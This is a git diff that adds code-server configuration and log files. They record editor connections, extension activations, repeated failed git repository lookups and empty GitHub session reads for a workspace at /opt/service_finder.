[192.168.100.179][9f4b60a3][ExtensionHostConnection] <530> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +[2026-01-29T20:45:01.295Z] info code-server 4.108.1 ba588b47099b31ad9734ef05534e9813bae22c64 +[2026-01-29T20:45:01.296Z] info Using user-data-dir /root/.local/share/code-server +[2026-01-29T20:45:01.312Z] info Using config file /root/.config/code-server/config.yaml +[2026-01-29T20:45:01.312Z] info HTTP server listening on http://0.0.0.0:8080/ +[2026-01-29T20:45:01.312Z] info - Authentication is enabled +[2026-01-29T20:45:01.312Z] info - Using password from $PASSWORD +[2026-01-29T20:45:01.312Z] info - Not serving HTTPS +[2026-01-29T20:45:01.313Z] info Session server listening on /root/.local/share/code-server/code-server-ipc.sock +[21:45:20] + + + + +[reconnection-grace-time] No CLI argument provided, using default: 10800000ms (10800s) +[21:45:20] Extension host agent started. +[21:56:09] [192.168.100.179][cb7e3643][ManagementConnection] New connection established. +[21:56:09] [192.168.100.179][0a163e9d][ExtensionHostConnection] New connection established. +[21:56:09] [192.168.100.179][0a163e9d][ExtensionHostConnection] <536> Launched Extension Host Process. +[21:56:10] [192.168.100.179][0a163e9d][ExtensionHostConnection] <536> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +[02:08:29] [192.168.100.179][cb7e3643][ManagementConnection] The client has disconnected, will wait for reconnection 3h before disposing... +[05:08:38] [192.168.100.179][cb7e3643][ManagementConnection] The reconnection grace time of 3h has expired, so the connection will be disposed. +[05:08:43] [192.168.100.179][0a163e9d][ExtensionHostConnection] <536> Extension Host Process exited with code: 0, signal: null. +[17:35:14] [192.168.100.179][f7137067][ManagementConnection] New connection established. +[17:35:15] [192.168.100.179][f34e954b][ExtensionHostConnection] New connection established. +[17:35:15] [192.168.100.179][f34e954b][ExtensionHostConnection] <77728> Launched Extension Host Process. +[17:35:15] [192.168.100.179][f34e954b][ExtensionHostConnection] <77728> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +[01:39:06] [192.168.100.179][f7137067][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +[01:39:06] [192.168.100.179][f34e954b][ExtensionHostConnection] <77728> Extension Host Process exited with code: 0, signal: null. +[09:15:35] [192.168.100.179][eb94e503][ManagementConnection] New connection established. +[09:15:35] [192.168.100.179][20bace34][ExtensionHostConnection] New connection established. +[09:15:35] [192.168.100.179][20bace34][ExtensionHostConnection] <166721> Launched Extension Host Process. +[09:15:36] [192.168.100.179][20bace34][ExtensionHostConnection] <166721> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +[10:53:10] [192.168.100.179][eb94e503][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +[10:53:10] [192.168.100.179][20bace34][ExtensionHostConnection] <166721> Extension Host Process exited with code: 0, signal: null. +[10:53:11] [192.168.100.179][8ab0a67c][ManagementConnection] New connection established. +[10:53:12] [192.168.100.179][49344707][ExtensionHostConnection] New connection established. +[10:53:12] [192.168.100.179][49344707][ExtensionHostConnection] <184448> Launched Extension Host Process. +[10:53:12] [192.168.100.179][49344707][ExtensionHostConnection] <184448> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +[17:27:10] [192.168.100.179][8ab0a67c][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +[17:27:10] [192.168.100.179][49344707][ExtensionHostConnection] <184448> Extension Host Process exited with code: 0, signal: null. +[10:47:06] [192.168.100.179][07bd2cc3][ManagementConnection] New connection established. +[10:47:07] [192.168.100.179][2f62359d][ExtensionHostConnection] New connection established. +[10:47:07] [192.168.100.179][2f62359d][ExtensionHostConnection] <254566> Launched Extension Host Process. +[10:47:07] [192.168.100.179][2f62359d][ExtensionHostConnection] <254566> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +[15:08:33] [192.168.100.179][07bd2cc3][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +[15:08:33] [192.168.100.179][2f62359d][ExtensionHostConnection] <254566> Extension Host Process exited with code: 0, signal: null. +[22:43:11] [192.168.100.179][7a024c31][ManagementConnection] New connection established. +[22:43:12] [192.168.100.179][8d916ed9][ExtensionHostConnection] New connection established. +[22:43:12] [192.168.100.179][8d916ed9][ExtensionHostConnection] <301229> Launched Extension Host Process. +[22:43:12] [192.168.100.179][8d916ed9][ExtensionHostConnection] <301229> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +[01:36:05] [192.168.100.179][7a024c31][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +[01:36:05] [192.168.100.179][8d916ed9][ExtensionHostConnection] <301229> Extension Host Process exited with code: 0, signal: null. +[22:14:28] [192.168.100.179][790e4a0c][ManagementConnection] New connection established. +[22:14:28] [192.168.100.179][a42b8966][ExtensionHostConnection] New connection established. +[22:14:28] [192.168.100.179][a42b8966][ExtensionHostConnection] <332306> Launched Extension Host Process. +[22:14:29] [192.168.100.179][a42b8966][ExtensionHostConnection] <332306> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + diff --git a/.vscode_config/.local/share/code-server/coder.json b/.vscode_config/.local/share/code-server/coder.json new file mode 100755 index 0000000..ec09dd0 --- /dev/null +++ b/.vscode_config/.local/share/code-server/coder.json @@ -0,0 +1,9 @@ +{ + "query": { + "folder": "/opt/service_finder" + }, + "update": { + "checked": 1770066868786, + "version": "4.108.2" + } +} \ No newline at end of file diff --git a/.vscode_config/.local/share/code-server/heartbeat b/.vscode_config/.local/share/code-server/heartbeat new file mode 100755 index 0000000..e69de29 diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost1/remoteExtHostTelemetry.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost1/remoteExtHostTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost1/remoteexthost.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost1/remoteexthost.log new file mode 100755 index 0000000..8e3e231 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost1/remoteexthost.log @@ -0,0 +1,13 @@ +2026-01-25 23:35:19.262 [info] Extension host with pid 529 started +2026-01-25 23:35:19.271 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/-53e2bffc/vscode.lock': Lock acquired. +2026-01-25 23:35:19.405 [info] ExtensionService#_doActivateExtension vscode.github-authentication, startup: false, activationEvent: 'onAuthenticationRequest:github' +2026-01-25 23:35:19.493 [info] ExtensionService#_doActivateExtension vscode.git-base, startup: true, activationEvent: '*', root cause: vscode.git +2026-01-25 23:35:19.504 [info] ExtensionService#_doActivateExtension vscode.git, startup: true, activationEvent: '*' +2026-01-25 23:35:19.504 [info] ExtensionService#_doActivateExtension vscode.github, startup: true, activationEvent: '*' +2026-01-25 23:35:19.680 [info] Eager extensions activated +2026-01-25 23:35:19.680 [info] ExtensionService#_doActivateExtension vscode.debug-auto-launch, startup: false, activationEvent: 'onStartupFinished' +2026-01-25 23:35:19.680 [info] ExtensionService#_doActivateExtension vscode.merge-conflict, startup: false, activationEvent: 'onStartupFinished' +2026-01-25 23:35:19.716 [info] ExtensionService#_doActivateExtension vscode.terminal-suggest, startup: false, activationEvent: 'onTerminalShellIntegration:*' +2026-01-25 23:36:17.275 [info] Extension host terminating: received terminate message from renderer +2026-01-25 23:36:17.276 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/-53e2bffc/vscode.lock': Marking the lockfile as scheduled to be released in 6000 ms. +2026-01-25 23:36:17.308 [info] Extension host with pid 529 exiting with code 0 diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost1/vscode.git/Git.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost1/vscode.git/Git.log new file mode 100755 index 0000000..3ea8b57 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost1/vscode.git/Git.log @@ -0,0 +1,11 @@ +2026-01-25 23:35:19.811 [info] [main] Log level: Info +2026-01-25 23:35:19.811 [info] [main] Validating found git in: "git" +2026-01-25 23:35:19.811 [info] [main] Using git "2.39.5" from "git" +2026-01-25 23:35:19.811 [info] [Model][doInitialScan] Initial repository scan started +2026-01-25 23:35:19.811 [info] > git rev-parse --show-toplevel [2ms] +2026-01-25 23:35:19.811 [info] fatal: not a git repository (or any of the parent directories): .git +2026-01-25 23:35:19.811 [info] [Model][doInitialScan] Initial repository scan completed - repositories (0), closed repositories (0), parent repositories (0), unsafe repositories (0) +2026-01-25 23:35:19.846 [info] > git rev-parse --show-toplevel [1ms] +2026-01-25 23:35:19.846 [info] fatal: not a git repository (or any of the parent directories): .git +2026-01-25 23:35:20.715 [info] > git rev-parse --show-toplevel [2ms] +2026-01-25 23:35:20.715 [info] fatal: not a git repository (or any of the parent directories): .git diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost1/vscode.github-authentication/GitHub Authentication.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost1/vscode.github-authentication/GitHub Authentication.log new file mode 100755 index 0000000..c0e84fe --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost1/vscode.github-authentication/GitHub Authentication.log @@ -0,0 +1,33 @@ +2026-01-25 23:35:19.614 [info] Reading sessions from keychain... +2026-01-25 23:35:19.614 [info] Getting sessions for all scopes... +2026-01-25 23:35:19.614 [info] Got 0 sessions for ... +2026-01-25 23:35:19.614 [info] Getting sessions for all scopes... +2026-01-25 23:35:19.614 [info] Got 0 sessions for ... +2026-01-25 23:35:19.614 [info] Getting sessions for all scopes... +2026-01-25 23:35:19.614 [info] Got 0 sessions for ... +2026-01-25 23:35:19.614 [info] Getting sessions for all scopes... +2026-01-25 23:35:19.614 [info] Got 0 sessions for ... +2026-01-25 23:35:19.614 [info] Getting sessions for all scopes... +2026-01-25 23:35:19.614 [info] Got 0 sessions for ... +2026-01-25 23:35:19.614 [info] Getting sessions for all scopes... +2026-01-25 23:35:19.614 [info] Got 0 sessions for ... +2026-01-25 23:35:19.614 [info] Getting sessions for all scopes... +2026-01-25 23:35:19.614 [info] Got 0 sessions for ... +2026-01-25 23:35:19.614 [info] Getting sessions for all scopes... +2026-01-25 23:35:19.614 [info] Got 0 sessions for ... +2026-01-25 23:35:19.614 [info] Getting sessions for all scopes... +2026-01-25 23:35:19.614 [info] Got 0 sessions for ... +2026-01-25 23:35:19.614 [info] Getting sessions for all scopes... +2026-01-25 23:35:19.614 [info] Got 0 sessions for ... +2026-01-25 23:35:19.614 [info] Getting sessions for all scopes... +2026-01-25 23:35:19.614 [info] Got 0 sessions for ... +2026-01-25 23:35:19.614 [info] Getting sessions for all scopes... +2026-01-25 23:35:19.614 [info] Got 0 sessions for ... +2026-01-25 23:35:19.614 [info] Getting sessions for all scopes... +2026-01-25 23:35:19.614 [info] Got 0 sessions for ... +2026-01-25 23:35:19.614 [info] Getting sessions for all scopes... +2026-01-25 23:35:19.614 [info] Got 0 sessions for ... +2026-01-25 23:35:19.614 [info] Getting sessions for all scopes... +2026-01-25 23:35:19.614 [info] Got 0 sessions for ... +2026-01-25 23:35:20.717 [info] Getting sessions for all scopes... +2026-01-25 23:35:20.717 [info] Got 0 sessions for ... diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost1/vscode.github/GitHub.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost1/vscode.github/GitHub.log new file mode 100755 index 0000000..79b2d14 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost1/vscode.github/GitHub.log @@ -0,0 +1 @@ +2026-01-25 23:35:19.813 [info] Log level: Info diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost10/remoteExtHostTelemetry.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost10/remoteExtHostTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost10/remoteexthost.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost10/remoteexthost.log new file mode 100755 index 0000000..43dc349 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost10/remoteexthost.log @@ -0,0 +1,12 @@ +2026-01-26 07:13:41.255 [info] Extension host with pid 46172 started +2026-01-26 07:13:41.266 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/3d7c237e/vscode.lock': Lock acquired. +2026-01-26 07:13:41.375 [info] ExtensionService#_doActivateExtension vscode.github-authentication, startup: false, activationEvent: 'onAuthenticationRequest:github' +2026-01-26 07:13:41.376 [info] ExtensionService#_doActivateExtension vscode.emmet, startup: false, activationEvent: 'onLanguage' +2026-01-26 07:13:41.481 [info] ExtensionService#_doActivateExtension vscode.git-base, startup: true, activationEvent: '*', root cause: vscode.git +2026-01-26 07:13:41.506 [info] ExtensionService#_doActivateExtension vscode.git, startup: true, activationEvent: '*' +2026-01-26 07:13:41.506 [info] ExtensionService#_doActivateExtension vscode.github, startup: true, activationEvent: '*' +2026-01-26 07:13:41.644 [info] Eager extensions activated +2026-01-26 07:13:41.644 [info] ExtensionService#_doActivateExtension vscode.debug-auto-launch, startup: false, activationEvent: 'onStartupFinished' +2026-01-26 07:13:41.645 [info] ExtensionService#_doActivateExtension vscode.merge-conflict, startup: false, activationEvent: 'onStartupFinished' +2026-01-26 07:48:19.506 [info] ExtensionService#_doActivateExtension vscode.terminal-suggest, startup: false, activationEvent: 'onTerminalShellIntegration:*' +2026-01-26 09:11:49.063 [info] ExtensionService#_doActivateExtension vscode.npm, startup: false, activationEvent: 'onTerminalQuickFixRequest:ms-vscode.npm-command' diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost10/vscode.git/Git.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost10/vscode.git/Git.log new file mode 100755 index 0000000..1151b72 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost10/vscode.git/Git.log @@ -0,0 +1,167 @@ +2026-01-26 07:13:41.680 [info] [main] Log level: Info +2026-01-26 07:13:41.680 [info] [main] Validating found git in: "git" +2026-01-26 07:13:41.680 [info] [main] Using git "2.39.5" from "git" +2026-01-26 07:13:41.680 [info] [Model][doInitialScan] Initial repository scan started +2026-01-26 07:13:41.680 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 07:13:41.680 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 07:13:41.681 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 07:13:41.681 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 07:13:41.685 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 07:13:41.685 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 07:13:41.689 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 07:13:41.689 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 07:13:41.693 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 07:13:41.693 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 07:13:41.699 [info] > git rev-parse --show-toplevel [3ms] +2026-01-26 07:13:41.699 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 07:13:41.728 [info] > git rev-parse --show-toplevel [25ms] +2026-01-26 07:13:41.728 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 07:13:41.733 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 07:13:41.733 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 07:13:41.740 [info] > git rev-parse --show-toplevel [4ms] +2026-01-26 07:13:41.740 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 07:13:41.744 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 07:13:41.744 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 07:13:41.749 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 07:13:41.749 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 07:13:41.752 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 07:13:41.752 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 07:13:41.756 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 07:13:41.756 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 07:13:41.759 [info] [Model][doInitialScan] Initial repository scan completed - repositories (0), closed repositories (0), parent repositories (0), unsafe repositories (0) +2026-01-26 07:13:42.835 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 07:13:42.836 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 07:41:54.643 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 07:41:54.643 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 07:43:37.389 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 07:43:37.389 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 07:48:19.146 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 07:48:19.146 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 07:48:19.648 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 07:48:19.648 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 07:50:24.101 [info] > git rev-parse --show-toplevel [3ms] +2026-01-26 07:50:24.101 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 07:51:36.100 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 07:51:36.101 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 08:07:37.716 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 08:07:37.716 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 08:08:03.138 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 08:08:03.138 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 08:22:39.629 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 08:22:39.629 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 08:22:53.304 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 08:22:53.304 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 08:35:08.649 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 08:35:08.649 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 08:36:14.599 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 08:36:14.599 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 08:39:21.087 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 08:39:21.087 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 08:40:08.086 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 08:40:08.086 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 08:50:00.089 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 08:50:00.089 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 08:51:22.173 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 08:51:22.173 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 09:00:59.944 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 09:00:59.944 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 09:02:15.771 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 09:02:15.771 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 09:06:39.254 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 09:06:39.254 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 09:07:40.257 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 09:07:40.257 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 09:12:15.367 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 09:12:15.367 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 09:14:36.036 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 09:14:36.036 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 09:22:37.742 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 09:22:37.742 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 09:23:41.738 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 09:23:41.738 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 09:41:56.257 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 09:41:56.257 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 09:42:25.124 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 09:42:25.124 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 09:45:06.303 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 09:45:06.303 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 09:45:32.498 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 09:45:32.498 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 09:55:50.317 [info] > git rev-parse --show-toplevel [4ms] +2026-01-26 09:55:50.318 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 09:56:35.686 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 09:56:35.686 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 10:05:09.716 [info] > git rev-parse --show-toplevel [3ms] +2026-01-26 10:05:09.717 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 10:05:53.854 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 10:05:53.854 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 10:09:24.942 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 10:09:24.942 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 10:10:13.888 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 10:10:13.889 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 10:16:17.827 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 10:16:17.827 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 10:16:57.663 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 10:16:57.663 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 10:18:52.203 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 10:18:52.203 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 10:19:26.184 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 10:19:26.184 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 10:29:05.318 [info] > git rev-parse --show-toplevel [4ms] +2026-01-26 10:29:05.318 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 10:29:25.970 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 10:29:25.970 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost10/vscode.github-authentication/GitHub Authentication.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost10/vscode.github-authentication/GitHub Authentication.log new file mode 100755 index 0000000..24b913f --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost10/vscode.github-authentication/GitHub Authentication.log @@ -0,0 +1,33 @@ +2026-01-26 07:13:41.572 [info] Reading sessions from keychain... +2026-01-26 07:13:41.572 [info] Getting sessions for all scopes... +2026-01-26 07:13:41.572 [info] Got 0 sessions for ... +2026-01-26 07:13:41.572 [info] Getting sessions for all scopes... +2026-01-26 07:13:41.572 [info] Got 0 sessions for ... +2026-01-26 07:13:41.572 [info] Getting sessions for all scopes... +2026-01-26 07:13:41.572 [info] Got 0 sessions for ... +2026-01-26 07:13:41.572 [info] Getting sessions for all scopes... +2026-01-26 07:13:41.572 [info] Got 0 sessions for ... +2026-01-26 07:13:41.572 [info] Getting sessions for all scopes... +2026-01-26 07:13:41.572 [info] Got 0 sessions for ... +2026-01-26 07:13:41.572 [info] Getting sessions for all scopes... +2026-01-26 07:13:41.572 [info] Got 0 sessions for ... +2026-01-26 07:13:41.572 [info] Getting sessions for all scopes... +2026-01-26 07:13:41.572 [info] Got 0 sessions for ... +2026-01-26 07:13:41.572 [info] Getting sessions for all scopes... +2026-01-26 07:13:41.572 [info] Got 0 sessions for ... +2026-01-26 07:13:41.573 [info] Getting sessions for all scopes... +2026-01-26 07:13:41.573 [info] Got 0 sessions for ... +2026-01-26 07:13:41.573 [info] Getting sessions for all scopes... +2026-01-26 07:13:41.573 [info] Got 0 sessions for ... +2026-01-26 07:13:41.597 [info] Getting sessions for all scopes... +2026-01-26 07:13:41.597 [info] Got 0 sessions for ... +2026-01-26 07:13:41.598 [info] Getting sessions for all scopes... +2026-01-26 07:13:41.598 [info] Got 0 sessions for ... 